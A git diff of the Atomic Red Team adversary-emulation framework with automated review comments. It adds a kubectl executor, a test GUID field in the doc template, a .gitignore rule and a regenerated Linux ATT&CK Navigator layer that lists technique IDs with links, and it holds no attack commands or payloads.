diff --git a/.gitignore b/.gitignore
index f2f8d099..652699ed 100644
--- a/.gitignore
+++ b/.gitignore
@@ -24,3 +24,6 @@ docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
+
+# Credential files
+*.creds
\ No newline at end of file
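Review bot: Ignoring `*.creds` only keeps new files from being staged by accident; it has no effect on a `.creds` file that is already tracked, on `git add -f`, or on credentials saved under any other name, so it should not be the only safeguard against committing secrets. If a `.creds` file is already in history it needs `git rm --cached` plus rotation of the credential, and a secret-scanning pre-commit hook would catch the cases this pattern misses. The added line also lacks a trailing newline, which will show up as a spurious change the next time someone appends to this file.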
diff --git a/README.md b/README.md
index a1258851..0a0bc26d 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ See: https://atomicredteam.io
## Having trouble?
-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
+Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
## Getting Started
diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb
index dd71601b..d2dbbe9b 100644
--- a/atomic_red_team/atomic_doc_template.md.erb
+++ b/atomic_red_team/atomic_doc_template.md.erb
@@ -25,13 +25,17 @@
end
end.join(', ') %>
+
+**auto_generated_guid:** <%= test['auto_generated_guid'] %>
+
+
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"\")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
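Review bot: The new `**auto_generated_guid:**` line renders `test['auto_generated_guid']` unconditionally, so a test without that field produces a bold label followed by nothing, unlike the `input_arguments` section just below which is guarded by an `if`. If the field is optional in spec.yaml (not visible here), wrap it the same way: `<% if test['auto_generated_guid'] -%>` / `**auto_generated_guid:** <%= test['auto_generated_guid'] %>` / `<% end -%>`. If the validator guarantees the field is always present, a short ERB comment saying so would stop the next reader from asking the same question.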
@@ -75,7 +79,7 @@ end%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
-<%= dep['prereq_command'].strip %>
+<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb
index 24a4c811..f7b63964 100755
--- a/atomic_red_team/atomic_red_team.rb
+++ b/atomic_red_team/atomic_red_team.rb
@@ -142,7 +142,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
- valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
+ valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
- when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
+ when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
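Review bot: The `when` list on the new line duplicates `valid_executor_types` from the first hunk minus `'manual'`, so the two lists must be edited in lockstep, and a future executor added to one but not the other would either be rejected or skip the `command` checks. Deriving the arm from the array keeps a single source of truth: `when *(valid_executor_types - ['manual'])`. The enclosing `case executor['name']` begins before this hunk and its remaining arms are not visible here, so check that no `else` branch depends on the literal list.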
diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml
index 9ccd2b42..7f34d392 100644
--- a/atomic_red_team/spec.yaml
+++ b/atomic_red_team/spec.yaml
@@ -115,7 +115,7 @@ atomic_tests:
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
- # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
+ # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index fbe9e18a..cc0218bb 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID"
:"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"
T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment
":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://
github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comme
nt":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment"
:"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcan
aryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529
/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blo
b/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi